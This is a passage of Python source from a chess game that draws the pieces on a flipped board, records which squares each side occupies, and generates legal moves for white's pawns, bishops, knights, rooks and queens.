self.black_king_img_rect.y = self.black_king_img_rect.y - (self.black_king_img_rect.y * 2) + (startup.screen_height - startup.tile_size)
startup.screen.blit(self.black_king_img, self.black_king_img_rect)
def draw_pieces_black(self):
for i in range(0, 8):
if self.white_pawns_inf[i][2] == True:
self.white_pawn_img_rect.x = self.white_pawns_inf[i][0] * startup.tile_size
self.white_pawn_img_rect.x = self.white_pawn_img_rect.x - (self.white_pawn_img_rect.x * 2) + (startup.screen_height - startup.tile_size)
self.white_pawn_img_rect.y = self.white_pawns_inf[i][1] * startup.tile_size
startup.screen.blit(self.white_pawn_img, self.white_pawn_img_rect)
for i in range(0, 2):
if self.white_bishops_inf[i][2] == True:
self.white_bishop_img_rect.x = self.white_bishops_inf[i][0] * startup.tile_size
self.white_bishop_img_rect.x = self.white_bishop_img_rect.x - (self.white_bishop_img_rect.x * 2) + (startup.screen_height - startup.tile_size)
self.white_bishop_img_rect.y = self.white_bishops_inf[i][1] * startup.tile_size
startup.screen.blit(self.white_bishop_img, self.white_bishop_img_rect)
for i in range(0, 2):
if self.white_knights_inf[i][2] == True:
self.white_knight_img_rect.x = self.white_knights_inf[i][0] * startup.tile_size
self.white_knight_img_rect.x = self.white_knight_img_rect.x - (self.white_knight_img_rect.x * 2) + (startup.screen_height - startup.tile_size)
self.white_knight_img_rect.y = self.white_knights_inf[i][1] * startup.tile_size
startup.screen.blit(self.white_knight_img, self.white_knight_img_rect)
for i in range(0, 2):
if self.white_rooks_inf[i][2] == True:
self.white_rook_img_rect.x = self.white_rooks_inf[i][0] * startup.tile_size
self.white_rook_img_rect.x = self.white_rook_img_rect.x - (self.white_rook_img_rect.x * 2) + (startup.screen_height - startup.tile_size)
self.white_rook_img_rect.y = self.white_rooks_inf[i][1] * startup.tile_size
startup.screen.blit(self.white_rook_img, self.white_rook_img_rect)
if self.white_queens_inf[0][2] == True:
self.white_queen_img_rect.x = self.white_queens_inf[0][0] * startup.tile_size
self.white_queen_img_rect.x = self.white_queen_img_rect.x - (self.white_queen_img_rect.x * 2) + (startup.screen_height - startup.tile_size)
self.white_queen_img_rect.y = self.white_queens_inf[0][1] * startup.tile_size
startup.screen.blit(self.white_queen_img, self.white_queen_img_rect)
if self.white_king_inf[0][2] == True:
self.white_king_img_rect.x = self.white_king_inf[0][0] * startup.tile_size
self.white_king_img_rect.x = self.white_king_img_rect.x - (self.white_king_img_rect.x * 2) + (startup.screen_height - startup.tile_size)
self.white_king_img_rect.y = self.white_king_inf[0][1] * startup.tile_size
startup.screen.blit(self.white_king_img, self.white_king_img_rect)
for i in range(0, 8):
if self.black_pawns_inf[i][2] == True:
self.black_pawn_img_rect.x = self.black_pawns_inf[i][0] * startup.tile_size
self.black_pawn_img_rect.x = self.black_pawn_img_rect.x - (self.black_pawn_img_rect.x * 2) + (startup.screen_height - startup.tile_size)
self.black_pawn_img_rect.y = self.black_pawns_inf[i][1] * startup.tile_size
startup.screen.blit(self.black_pawn_img, self.black_pawn_img_rect)
for i in range(0, 2):
if self.black_bishops_inf[i][2] == True:
self.black_bishop_img_rect.x = self.black_bishops_inf[i][0] * startup.tile_size
self.black_bishop_img_rect.x = self.black_bishop_img_rect.x - (self.black_bishop_img_rect.x * 2) + (startup.screen_height - startup.tile_size)
self.black_bishop_img_rect.y = self.black_bishops_inf[i][1] * startup.tile_size
startup.screen.blit(self.black_bishop_img, self.black_bishop_img_rect)
for i in range(0, 2):
if self.black_knights_inf[i][2] == True:
self.black_knight_img_rect.x = self.black_knights_inf[i][0] * startup.tile_size
self.black_knight_img_rect.x = self.black_knight_img_rect.x - (self.black_knight_img_rect.x * 2) + (startup.screen_height - startup.tile_size)
self.black_knight_img_rect.y = self.black_knights_inf[i][1] * startup.tile_size
startup.screen.blit(self.black_knight_img, self.black_knight_img_rect)
for i in range(0, 2):
if self.black_rooks_inf[i][2] == True:
self.black_rook_img_rect.x = self.black_rooks_inf[i][0] * startup.tile_size
self.black_rook_img_rect.x = self.black_rook_img_rect.x - (self.black_rook_img_rect.x * 2) + (startup.screen_height - startup.tile_size)
self.black_rook_img_rect.y = self.black_rooks_inf[i][1] * startup.tile_size
startup.screen.blit(self.black_rook_img, self.black_rook_img_rect)
if self.black_queens_inf[0][2] == True:
self.black_queen_img_rect.x = self.black_queens_inf[0][0] * startup.tile_size
self.black_queen_img_rect.x = self.black_queen_img_rect.x - (self.black_queen_img_rect.x * 2) + (startup.screen_height - startup.tile_size)
self.black_queen_img_rect.y = self.black_queens_inf[0][1] * startup.tile_size
startup.screen.blit(self.black_queen_img, self.black_queen_img_rect)
if self.black_king_inf[0][2] == True:
self.black_king_img_rect.x = self.black_king_inf[0][0] * startup.tile_size
self.black_king_img_rect.x = self.black_king_img_rect.x - (self.black_king_img_rect.x * 2) + (startup.screen_height - startup.tile_size)
self.black_king_img_rect.y = self.black_king_inf[0][1] * startup.tile_size
startup.screen.blit(self.black_king_img, self.black_king_img_rect)
def white_black_occupation(self):
self.white_occupation_x = []
self.white_occupation_y = []
self.black_occupation_x = []
self.black_occupation_y = []
for i in range(0, 8):
if self.white_pawns_inf[i][2] == True:
self.white_occupation_x.append(self.white_pawns_inf[i][0])
self.white_occupation_y.append(self.white_pawns_inf[i][1])
for i in range(0, 10):
if self.white_knights_inf[i][2] == True:
self.white_occupation_x.append(self.white_knights_inf[i][0])
self.white_occupation_y.append(self.white_knights_inf[i][1])
for i in range(0, 10):
if self.white_bishops_inf[i][2] == True:
self.white_occupation_x.append(self.white_bishops_inf[i][0])
self.white_occupation_y.append(self.white_bishops_inf[i][1])
for i in range(0, 10):
if self.white_rooks_inf[i][2] == True:
self.white_occupation_x.append(self.white_rooks_inf[i][0])
self.white_occupation_y.append(self.white_rooks_inf[i][1])
for i in range(0, 9):
if self.white_queens_inf[i][2] == True:
self.white_occupation_x.append(self.white_queens_inf[i][0])
self.white_occupation_y.append(self.white_queens_inf[i][1])
if self.white_king_inf[0][2] == True:
self.white_occupation_x.append(self.white_king_inf[0][0])
self.white_occupation_y.append(self.white_king_inf[0][1])
for i in range(0, 8):
if self.black_pawns_inf[i][2] == True:
self.black_occupation_x.append(self.black_pawns_inf[i][0])
self.black_occupation_y.append(self.black_pawns_inf[i][1])
for i in range(0, 10):
if self.black_knights_inf[i][2] == True:
self.black_occupation_x.append(self.black_knights_inf[i][0])
self.black_occupation_y.append(self.black_knights_inf[i][1])
for i in range(0, 10):
if self.black_bishops_inf[i][2] == True:
self.black_occupation_x.append(self.black_bishops_inf[i][0])
self.black_occupation_y.append(self.black_bishops_inf[i][1])
for i in range(0, 10):
if self.black_rooks_inf[i][2] == True:
self.black_occupation_x.append(self.black_rooks_inf[i][0])
self.black_occupation_y.append(self.black_rooks_inf[i][1])
for i in range(0, 9):
if self.black_queens_inf[i][2] == True:
self.black_occupation_x.append(self.black_queens_inf[i][0])
self.black_occupation_y.append(self.black_queens_inf[i][1])
if self.black_king_inf[0][2] == True:
self.black_occupation_x.append(self.black_king_inf[0][0])
self.black_occupation_y.append(self.black_king_inf[0][1])
def calc_legal_moves(self):
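# Build self.legal_moves: a list of candidate moves in algebraic notation (via
# notation.get_notation) for the side to move. Sliding-piece moves are tracked by
# name strings such as "rook_N_3" whose characters are parsed by index further down.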
self.legal_moves = []
if startup.white_turn == True:
for i in range(0, 8):
if self.white_pawns_inf[i][2] == True:
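# Pawn flags: pawn_N_1 = single push free, pawn_N_2 = double push free (only if the
# pawn has not moved yet, tracked at index 3), pawn_NE_11 / pawn_NW_11 = diagonal
# capture available, including en passant via self.en_passant_x_y.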
pawn_N_1 = True
pawn_N_2 = True
pawn_NE_11 = False
pawn_NW_11 = False
for j in range(0, len(self.white_occupation_x)):
if self.white_pawns_inf[i][0] == self.white_occupation_x[j] and self.white_pawns_inf[i][1] + 1 == self.white_occupation_y[j]:
pawn_N_1 = False
if self.white_pawns_inf[i][3] == True and self.white_pawns_inf[i][0] == self.white_occupation_x[j] and self.white_pawns_inf[i][1] + 2 == self.white_occupation_y[j]:
pawn_N_2 = False
for j in range(0, len(self.black_occupation_x)):
if self.white_pawns_inf[i][0] == self.black_occupation_x[j] and self.white_pawns_inf[i][1] + 1 == self.black_occupation_y[j]:
pawn_N_1 = False
if self.white_pawns_inf[i][3] == True and self.white_pawns_inf[i][0] == self.black_occupation_x[j] and self.white_pawns_inf[i][1] + 2 == self.black_occupation_y[j]:
pawn_N_2 = False
if self.white_pawns_inf[i][0] + 1 == self.black_occupation_x[j] and self.white_pawns_inf[i][1] + 1 == self.black_occupation_y[j]:
pawn_NE_11 = True
if self.white_pawns_inf[i][0] - 1 == self.black_occupation_x[j] and self.white_pawns_inf[i][1] + 1 == self.black_occupation_y[j]:
pawn_NW_11 = True
if self.white_pawns_inf[i][0] + 1 == self.en_passant_x_y[0] and self.white_pawns_inf[i][1] == self.en_passant_x_y[1]:
pawn_NE_11 = True
elif self.white_pawns_inf[i][0] - 1 == self.en_passant_x_y[0] and self.white_pawns_inf[i][1] == self.en_passant_x_y[1]:
pawn_NW_11 = True
if pawn_N_1 == True:
legal_move_notation = notation.get_notation("P", self.white_pawns_inf[i][0], self.white_pawns_inf[i][1], self.white_pawns_inf[i][0], self.white_pawns_inf[i][1] + 1)
if legal_move_notation[-1] == "=":
self.legal_moves.append(legal_move_notation + "Q")
self.legal_moves.append(legal_move_notation + "R")
self.legal_moves.append(legal_move_notation + "B")
self.legal_moves.append(legal_move_notation + "N")
else:
self.legal_moves.append(legal_move_notation)
if pawn_N_2 == True and pawn_N_1 == True and self.white_pawns_inf[i][3] == True:
legal_move_notation = notation.get_notation("P", self.white_pawns_inf[i][0], self.white_pawns_inf[i][1], self.white_pawns_inf[i][0], self.white_pawns_inf[i][1] + 2)
if legal_move_notation[-1] == "=":
self.legal_moves.append(legal_move_notation + "Q")
self.legal_moves.append(legal_move_notation + "R")
self.legal_moves.append(legal_move_notation + "B")
self.legal_moves.append(legal_move_notation + "N")
else:
self.legal_moves.append(legal_move_notation)
if pawn_NE_11 == True:
legal_move_notation = notation.get_notation("P", self.white_pawns_inf[i][0], self.white_pawns_inf[i][1], self.white_pawns_inf[i][0] + 1, self.white_pawns_inf[i][1] + 1)
if legal_move_notation[-1] == "=":
self.legal_moves.append(legal_move_notation + "Q")
self.legal_moves.append(legal_move_notation + "R")
self.legal_moves.append(legal_move_notation + "B")
self.legal_moves.append(legal_move_notation + "N")
else:
self.legal_moves.append(legal_move_notation)
if pawn_NW_11 == True:
legal_move_notation = notation.get_notation("P", self.white_pawns_inf[i][0], self.white_pawns_inf[i][1], self.white_pawns_inf[i][0] - 1, self.white_pawns_inf[i][1] + 1)
if legal_move_notation[-1] == "=":
self.legal_moves.append(legal_move_notation + "Q")
self.legal_moves.append(legal_move_notation + "R")
self.legal_moves.append(legal_move_notation + "B")
self.legal_moves.append(legal_move_notation + "N")
else:
self.legal_moves.append(legal_move_notation)
for i in range(0, 10):
if self.white_bishops_inf[i][2] == True:
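# Bishop rays are tracked by name: move[7:9] is the direction ("NE", "SE", "SW", "NW")
# and move[10] the distance. A ray is cut at the board edge, at the first friendly
# piece (that square included), and one square past the first enemy piece, so the
# capture itself stays available.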
move_list = ["bishop_NE_1", "bishop_NE_2", "bishop_NE_3", "bishop_NE_4", "bishop_NE_5", "bishop_NE_6", "bishop_NE_7", "bishop_SE_1", "bishop_SE_2", "bishop_SE_3", "bishop_SE_4", "bishop_SE_5", "bishop_SE_6", "bishop_SE_7", "bishop_SW_1", "bishop_SW_2", "bishop_SW_3", "bishop_SW_4", "bishop_SW_5", "bishop_SW_6", "bishop_SW_7", "bishop_NW_1", "bishop_NW_2", "bishop_NW_3", "bishop_NW_4", "bishop_NW_5", "bishop_NW_6", "bishop_NW_7"]
bishop_moves = {
"bishop_NE_1" : True,
"bishop_NE_2" : True,
"bishop_NE_3" : True,
"bishop_NE_4" : True,
"bishop_NE_5" : True,
"bishop_NE_6" : True,
"bishop_NE_7" : True,
"bishop_SE_1" : True,
"bishop_SE_2" : True,
"bishop_SE_3" : True,
"bishop_SE_4" : True,
"bishop_SE_5" : True,
"bishop_SE_6" : True,
"bishop_SE_7" : True,
"bishop_SW_1" : True,
"bishop_SW_2" : True,
"bishop_SW_3" : True,
"bishop_SW_4" : True,
"bishop_SW_5" : True,
"bishop_SW_6" : True,
"bishop_SW_7" : True,
"bishop_NW_1" : True,
"bishop_NW_2" : True,
"bishop_NW_3" : True,
"bishop_NW_4" : True,
"bishop_NW_5" : True,
"bishop_NW_6" : True,
"bishop_NW_7" : True,
}
for j in range(1, 8):
if self.white_bishops_inf[i][0] - j < 0:
for move in move_list:
if move[8] == "W" and int(move[10]) >= j:
bishop_moves[move] = False
if self.white_bishops_inf[i][1] - j < 0:
for move in move_list:
if move[7] == "S" and int(move[10]) >= j:
bishop_moves[move] = False
if self.white_bishops_inf[i][0] + j > 7:
for move in move_list:
if move[8] == "E" and int(move[10]) >= j:
bishop_moves[move] = False
if self.white_bishops_inf[i][1] + j > 7:
for move in move_list:
if move[7] == "N" and int(move[10]) >= j:
bishop_moves[move] = False
for j in range(1, 8):
for k in range(0, len(self.white_occupation_x)):
if self.white_bishops_inf[i][0] + j == self.white_occupation_x[k] and self.white_bishops_inf[i][1] + j == self.white_occupation_y[k]:
for move in move_list:
if move[7] == "N" and move[8] == "E" and int(move[10]) >= j:
bishop_moves[move] = False
elif self.white_bishops_inf[i][0] + j == self.white_occupation_x[k] and self.white_bishops_inf[i][1] - j == self.white_occupation_y[k]:
for move in move_list:
if move[7] == "S" and move[8] == "E" and int(move[10]) >= j:
bishop_moves[move] = False
elif self.white_bishops_inf[i][0] - j == self.white_occupation_x[k] and self.white_bishops_inf[i][1] - j == self.white_occupation_y[k]:
for move in move_list:
if move[7] == "S" and move[8] == "W" and int(move[10]) >= j:
bishop_moves[move] = False
elif self.white_bishops_inf[i][0] - j == self.white_occupation_x[k] and self.white_bishops_inf[i][1] + j == self.white_occupation_y[k]:
for move in move_list:
if move[7] == "N" and move[8] == "W" and int(move[10]) >= j:
bishop_moves[move] = False
for j in range(1, 8):
for k in range(0, len(self.black_occupation_x)):
if self.white_bishops_inf[i][0] + j == self.black_occupation_x[k] and self.white_bishops_inf[i][1] + j == self.black_occupation_y[k]:
for move in move_list:
if move[7] == "N" and move[8] == "E" and int(move[10]) > j:
bishop_moves[move] = False
elif self.white_bishops_inf[i][0] + j == self.black_occupation_x[k] and self.white_bishops_inf[i][1] - j == self.black_occupation_y[k]:
for move in move_list:
if move[7] == "S" and move[8] == "E" and int(move[10]) > j:
bishop_moves[move] = False
elif self.white_bishops_inf[i][0] - j == self.black_occupation_x[k] and self.white_bishops_inf[i][1] - j == self.black_occupation_y[k]:
for move in move_list:
if move[7] == "S" and move[8] == "W" and int(move[10]) > j:
bishop_moves[move] = False
elif self.white_bishops_inf[i][0] - j == self.black_occupation_x[k] and self.white_bishops_inf[i][1] + j == self.black_occupation_y[k]:
for move in move_list:
if move[7] == "N" and move[8] == "W" and int(move[10]) > j:
bishop_moves[move] = False
for move in move_list:
if bishop_moves[move] == True:
if move[7] == "N" and move[8] == "E":
self.legal_moves.append(notation.get_notation("B", self.white_bishops_inf[i][0], self.white_bishops_inf[i][1], self.white_bishops_inf[i][0] + int(move[10]), self.white_bishops_inf[i][1] + int(move[10])))
elif move[7] == "S" and move[8] == "E":
self.legal_moves.append(notation.get_notation("B", self.white_bishops_inf[i][0], self.white_bishops_inf[i][1], self.white_bishops_inf[i][0] + int(move[10]), self.white_bishops_inf[i][1] - int(move[10])))
elif move[7] == "S" and move[8] == "W":
self.legal_moves.append(notation.get_notation("B", self.white_bishops_inf[i][0], self.white_bishops_inf[i][1], self.white_bishops_inf[i][0] - int(move[10]), self.white_bishops_inf[i][1] - int(move[10])))
elif move[7] == "N" and move[8] == "W":
self.legal_moves.append(notation.get_notation("B", self.white_bishops_inf[i][0], self.white_bishops_inf[i][1], self.white_bishops_inf[i][0] - int(move[10]), self.white_bishops_inf[i][1] + int(move[10])))
for i in range(0, 10):
if self.white_knights_inf[i][2] == True:
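# Knights: the eight L-shaped jumps are named by direction and (dx, dy) order
# (e.g. NE_21 = +1 file, +2 ranks). Jumps off the board or onto a friendly piece
# are disabled; landing on an enemy piece is a capture and stays available.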
knight_NE_21 = True
knight_NE_12 = True
knight_SE_12 = True
knight_SE_21 = True
knight_SW_21 = True
knight_SW_12 = True
knight_NW_12 = True
knight_NW_21 = True
if self.white_knights_inf[i][0] - 1 < 0:
knight_SW_21 = False
knight_SW_12 = False
knight_NW_12 = False
knight_NW_21 = False
elif self.white_knights_inf[i][0] - 2 < 0:
knight_SW_12 = False
knight_NW_12 = False
if self.white_knights_inf[i][0] + 1 > 7:
knight_NE_21 = False
knight_NE_12 = False
knight_SE_12 = False
knight_SE_21 = False
elif self.white_knights_inf[i][0] + 2 > 7:
knight_NE_12 = False
knight_SE_12 = False
if self.white_knights_inf[i][1] - 1 < 0:
knight_SE_12 = False
knight_SE_21 = False
knight_SW_21 = False
knight_SW_12 = False
elif self.white_knights_inf[i][1] - 2 < 0:
knight_SE_21 = False
knight_SW_21 = False
if self.white_knights_inf[i][1] + 1 > 7:
knight_NE_21 = False
knight_NE_12 = False
knight_NW_12 = False
knight_NW_21 = False
elif self.white_knights_inf[i][1] + 2 > 7:
knight_NE_21 = False
knight_NW_21 = False
for j in range(0, len(self.white_occupation_x)):
if self.white_knights_inf[i][0] + 1 == self.white_occupation_x[j] and self.white_knights_inf[i][1] + 2 == self.white_occupation_y[j]:
knight_NE_21 = False
if self.white_knights_inf[i][0] + 2 == self.white_occupation_x[j] and self.white_knights_inf[i][1] + 1 == self.white_occupation_y[j]:
knight_NE_12 = False
if self.white_knights_inf[i][0] + 2 == self.white_occupation_x[j] and self.white_knights_inf[i][1] - 1 == self.white_occupation_y[j]:
knight_SE_12 = False
if self.white_knights_inf[i][0] + 1 == self.white_occupation_x[j] and self.white_knights_inf[i][1] - 2 == self.white_occupation_y[j]:
knight_SE_21 = False
if self.white_knights_inf[i][0] - 1 == self.white_occupation_x[j] and self.white_knights_inf[i][1] - 2 == self.white_occupation_y[j]:
knight_SW_21 = False
if self.white_knights_inf[i][0] - 2 == self.white_occupation_x[j] and self.white_knights_inf[i][1] - 1 == self.white_occupation_y[j]:
knight_SW_12 = False
if self.white_knights_inf[i][0] - 2 == self.white_occupation_x[j] and self.white_knights_inf[i][1] + 1 == self.white_occupation_y[j]:
knight_NW_12 = False
if self.white_knights_inf[i][0] - 1 == self.white_occupation_x[j] and self.white_knights_inf[i][1] + 2 == self.white_occupation_y[j]:
knight_NW_21 = False
if knight_NE_21 == True:
self.legal_moves.append(notation.get_notation("N", self.white_knights_inf[i][0], self.white_knights_inf[i][1], self.white_knights_inf[i][0] + 1, self.white_knights_inf[i][1] + 2))
if knight_NE_12 == True:
self.legal_moves.append(notation.get_notation("N", self.white_knights_inf[i][0], self.white_knights_inf[i][1], self.white_knights_inf[i][0] + 2, self.white_knights_inf[i][1] + 1))
if knight_SE_12 == True:
self.legal_moves.append(notation.get_notation("N", self.white_knights_inf[i][0], self.white_knights_inf[i][1], self.white_knights_inf[i][0] + 2, self.white_knights_inf[i][1] - 1))
if knight_SE_21 == True:
self.legal_moves.append(notation.get_notation("N", self.white_knights_inf[i][0], self.white_knights_inf[i][1], self.white_knights_inf[i][0] + 1, self.white_knights_inf[i][1] - 2))
if knight_SW_21 == True:
self.legal_moves.append(notation.get_notation("N", self.white_knights_inf[i][0], self.white_knights_inf[i][1], self.white_knights_inf[i][0] - 1, self.white_knights_inf[i][1] - 2))
if knight_SW_12 == True:
self.legal_moves.append(notation.get_notation("N", self.white_knights_inf[i][0], self.white_knights_inf[i][1], self.white_knights_inf[i][0] - 2, self.white_knights_inf[i][1] - 1))
if knight_NW_12 == True:
self.legal_moves.append(notation.get_notation("N", self.white_knights_inf[i][0], self.white_knights_inf[i][1], self.white_knights_inf[i][0] - 2, self.white_knights_inf[i][1] + 1))
if knight_NW_21 == True:
self.legal_moves.append(notation.get_notation("N", self.white_knights_inf[i][0], self.white_knights_inf[i][1], self.white_knights_inf[i][0] - 1, self.white_knights_inf[i][1] + 2))
for i in range(0, 10):
if self.white_rooks_inf[i][2] == True:
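# Rooks use the same ray scheme as bishops: move[5] is the direction (N/E/S/W) and
# move[7] the distance, with friendly pieces blocking from their own square onwards
# and enemy pieces blocking from the square behind them.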
move_list = ["rook_N_1", "rook_N_2", "rook_N_3", "rook_N_4", "rook_N_5", "rook_N_6", "rook_N_7", "rook_E_1", "rook_E_2", "rook_E_3", "rook_E_4", "rook_E_5", "rook_E_6", "rook_E_7", "rook_S_1", "rook_S_2", "rook_S_3", "rook_S_4", "rook_S_5", "rook_S_6", "rook_S_7", "rook_W_1", "rook_W_2", "rook_W_3", "rook_W_4", "rook_W_5", "rook_W_6", "rook_W_7"]
rook_moves = {
"rook_N_1" : True,
"rook_N_2" : True,
"rook_N_3" : True,
"rook_N_4" : True,
"rook_N_5" : True,
"rook_N_6" : True,
"rook_N_7" : True,
"rook_E_1" : True,
"rook_E_2" : True,
"rook_E_3" : True,
"rook_E_4" : True,
"rook_E_5" : True,
"rook_E_6" : True,
"rook_E_7" : True,
"rook_S_1" : True,
"rook_S_2" : True,
"rook_S_3" : True,
"rook_S_4" : True,
"rook_S_5" : True,
"rook_S_6" : True,
"rook_S_7" : True,
"rook_W_1" : True,
"rook_W_2" : True,
"rook_W_3" : True,
"rook_W_4" : True,
"rook_W_5" : True,
"rook_W_6" : True,
"rook_W_7" : True,
}
for j in range(1, 8):
if self.white_rooks_inf[i][0] - j < 0:
for move in move_list:
if move[5] == "W" and int(move[7]) >= j:
rook_moves[move] = False
if self.white_rooks_inf[i][1] - j < 0:
for move in move_list:
if move[5] == "S" and int(move[7]) >= j:
rook_moves[move] = False
if self.white_rooks_inf[i][0] + j > 7:
for move in move_list:
if move[5] == "E" and int(move[7]) >= j:
rook_moves[move] = False
if self.white_rooks_inf[i][1] + j > 7:
for move in move_list:
if move[5] == "N" and int(move[7]) >= j:
rook_moves[move] = False
for j in range(1, 8):
for k in range(0, len(self.white_occupation_x)):
if self.white_rooks_inf[i][0] == self.white_occupation_x[k] and self.white_rooks_inf[i][1] + j == self.white_occupation_y[k]:
for move in move_list:
if move[5] == "N" and int(move[7]) >= j:
rook_moves[move] = False
elif self.white_rooks_inf[i][0] + j == self.white_occupation_x[k] and self.white_rooks_inf[i][1] == self.white_occupation_y[k]:
for move in move_list:
if move[5] == "E" and int(move[7]) >= j:
rook_moves[move] = False
elif self.white_rooks_inf[i][0] == self.white_occupation_x[k] and self.white_rooks_inf[i][1] - j == self.white_occupation_y[k]:
for move in move_list:
if move[5] == "S" and int(move[7]) >= j:
rook_moves[move] = False
elif self.white_rooks_inf[i][0] - j == self.white_occupation_x[k] and self.white_rooks_inf[i][1] == self.white_occupation_y[k]:
for move in move_list:
if move[5] == "W" and int(move[7]) >= j:
rook_moves[move] = False
for j in range(1, 8):
for k in range(0, len(self.black_occupation_x)):
if self.white_rooks_inf[i][0] == self.black_occupation_x[k] and self.white_rooks_inf[i][1] + j == self.black_occupation_y[k]:
for move in move_list:
if move[5] == "N" and int(move[7]) > j:
rook_moves[move] = False
elif self.white_rooks_inf[i][0] + j == self.black_occupation_x[k] and self.white_rooks_inf[i][1] == self.black_occupation_y[k]:
for move in move_list:
if move[5] == "E" and int(move[7]) > j:
rook_moves[move] = False
elif self.white_rooks_inf[i][0] == self.black_occupation_x[k] and self.white_rooks_inf[i][1] - j == self.black_occupation_y[k]:
for move in move_list:
if move[5] == "S" and int(move[7]) > j:
rook_moves[move] = False
elif self.white_rooks_inf[i][0] - j == self.black_occupation_x[k] and self.white_rooks_inf[i][1] == self.black_occupation_y[k]:
for move in move_list:
if move[5] == "W" and int(move[7]) > j:
rook_moves[move] = False
for move in move_list:
if rook_moves[move] == True:
if move[5] == "N":
self.legal_moves.append(notation.get_notation("R", self.white_rooks_inf[i][0], self.white_rooks_inf[i][1], self.white_rooks_inf[i][0], self.white_rooks_inf[i][1] + int(move[7])))
elif move[5] == "E":
self.legal_moves.append(notation.get_notation("R", self.white_rooks_inf[i][0], self.white_rooks_inf[i][1], self.white_rooks_inf[i][0] + int(move[7]), self.white_rooks_inf[i][1]))
elif move[5] == "S":
self.legal_moves.append(notation.get_notation("R", self.white_rooks_inf[i][0], self.white_rooks_inf[i][1], self.white_rooks_inf[i][0], self.white_rooks_inf[i][1] - int(move[7])))
elif move[5] == "W":
self.legal_moves.append(notation.get_notation("R", self.white_rooks_inf[i][0], self.white_rooks_inf[i][1], self.white_rooks_inf[i][0] - int(move[7]), self.white_rooks_inf[i][1]))
for i in range(0, 9):
if self.white_queens_inf[i][2] == True:
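# Queens combine both ray schemes: move[6] (and move[7] for diagonals) give the
# direction, move[7] == "_" marks a straight move, and the distance sits at move[8]
# (straight) or move[9] (diagonal).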
move_list = ["queen_N_1", "queen_N_2", "queen_N_3", "queen_N_4", "queen_N_5", "queen_N_6", "queen_N_7", "queen_NE_1", "queen_NE_2", "queen_NE_3", "queen_NE_4", "queen_NE_5", "queen_NE_6", "queen_NE_7", "queen_E_1", "queen_E_2", "queen_E_3", "queen_E_4", "queen_E_5", "queen_E_6", "queen_E_7", "queen_SE_1", "queen_SE_2", "queen_SE_3", "queen_SE_4", "queen_SE_5", "queen_SE_6", "queen_SE_7", "queen_S_1", "queen_S_2", "queen_S_3", "queen_S_4", "queen_S_5", "queen_S_6", "queen_S_7", "queen_SW_1", "queen_SW_2", "queen_SW_3", "queen_SW_4", "queen_SW_5", "queen_SW_6", "queen_SW_7", "queen_W_1", "queen_W_2", "queen_W_3", "queen_W_4", "queen_W_5", "queen_W_6", "queen_W_7", "queen_NW_1", "queen_NW_2", "queen_NW_3", "queen_NW_4", "queen_NW_5", "queen_NW_6", "queen_NW_7"]
queen_moves = {
"queen_N_1" : True,
"queen_N_2" : True,
"queen_N_3" : True,
"queen_N_4" : True,
"queen_N_5" : True,
"queen_N_6" : True,
"queen_N_7" : True,
"queen_NE_1" : True,
"queen_NE_2" : True,
"queen_NE_3" : True,
"queen_NE_4" : True,
"queen_NE_5" : True,
"queen_NE_6" : True,
"queen_NE_7" : True,
"queen_E_1" : True,
"queen_E_2" : True,
"queen_E_3" : True,
"queen_E_4" : True,
"queen_E_5" : True,
"queen_E_6" : True,
"queen_E_7" : True,
"queen_SE_1" : True,
"queen_SE_2" : True,
"queen_SE_3" : True,
"queen_SE_4" : True,
"queen_SE_5" : True,
"queen_SE_6" : True,
"queen_SE_7" : True,
"queen_S_1" : True,
"queen_S_2" : True,
"queen_S_3" : True,
"queen_S_4" : True,
"queen_S_5" : True,
"queen_S_6" : True,
"queen_S_7" : True,
"queen_SW_1" : True,
"queen_SW_2" : True,
"queen_SW_3" : True,
"queen_SW_4" : True,
"queen_SW_5" : True,
"queen_SW_6" : True,
"queen_SW_7" : True,
"queen_W_1" : True,
"queen_W_2" : True,
"queen_W_3" : True,
"queen_W_4" : True,
"queen_W_5" : True,
"queen_W_6" : True,
"queen_W_7" : True,
"queen_NW_1" : True,
"queen_NW_2" : True,
"queen_NW_3" : True,
"queen_NW_4" : True,
"queen_NW_5" : True,
"queen_NW_6" : True,
"queen_NW_7" : True,
}
for j in range(1, 8):
if self.white_queens_inf[i][0] - j < 0:
for move in move_list:
if move[6] == "W" or move[7] == "W":
if move[7] == "_":
if int(move[8]) >= j:
queen_moves[move] = False
elif int(move[9]) >= j:
queen_moves[move] = False
if self.white_queens_inf[i][1] - j < 0:
for move in move_list:
if move[6] == "S":
if move[7] == "_":
if int(move[8]) >= j:
queen_moves[move] = False
elif int(move[9]) >= j:
queen_moves[move] = False
if self.white_queens_inf[i][0] + j > 7:
for move in move_list:
if move[6] == "E" or move[7] == "E":
if move[7] == "_":
if int(move[8]) >= j:
queen_moves[move] = False
elif int(move[9]) >= j:
queen_moves[move] = False
if self.white_queens_inf[i][1] + j > 7:
for move in move_list:
if move[6] == "N":
if move[7] == "_":
if int(move[8]) >= j:
queen_moves[move] = False
elif int(move[9]) >= j:
queen_moves[move] = False
for j in range(1, 8):
for k in range(0, len(self.white_occupation_x)):
if self.white_queens_inf[i][0] == self.white_occupation_x[k] and self.white_queens_inf[i][1] + j == self.white_occupation_y[k]:
for move in move_list:
if move[6] == "N" and move[7] == "_" and int(move[8]) >= j:
queen_moves[move] = False
elif self.white_queens_inf[i][0] + j == self.white_occupation_x[k] and self.white_queens_inf[i][1] + j == self.white_occupation_y[k]:
for move in move_list:
if move[6] == "N" and move[7] == "E" and int(move[9]) >= j:
queen_moves[move] = False
elif self.white_queens_inf[i][0] + j == self.white_occupation_x[k] and self.white_queens_inf[i][1] == self.white_occupation_y[k]:
for move in move_list:
if move[6] == "E" and move[7] == "_" and int(move[8]) >= j:
queen_moves[move] = False
elif self.white_queens_inf[i][0] + j == self.white_occupation_x[k] and self.white_queens_inf[i][1] - j == self.white_occupation_y[k]:
for move in move_list:
if move[6] == "S" and move[7] == "E" and int(move[9]) >= j:
queen_moves[move] = False
elif self.white_queens_inf[i][0] == self.white_occupation_x[k] and self.white_queens_inf[i][1] - j == self.white_occupation_y[k]:
for move in move_list:
if move[6] == "S" and move[7] == "_" and int(move[8]) >= j:
queen_moves[move] = False
elif self.white_queens_inf[i][0] - j == self.white_occupation_x[k] and self.white_queens_inf[i][1] - j == self.white_occupation_y[k]:
for move in move_list:
if move[6] == "S" and move[7] == "W" and int(move[9]) >= j:
queen_moves[move] = False
elif self.white_queens_inf[i][0] - j == self.white_occupation_x[k] and self.white_queens_inf[i][1] == self.white_occupation_y[k]:
for move in move_list:
if move[6] == "W" and move[7] == "_" and int(move[8]) >= j:
queen_moves[move] = False
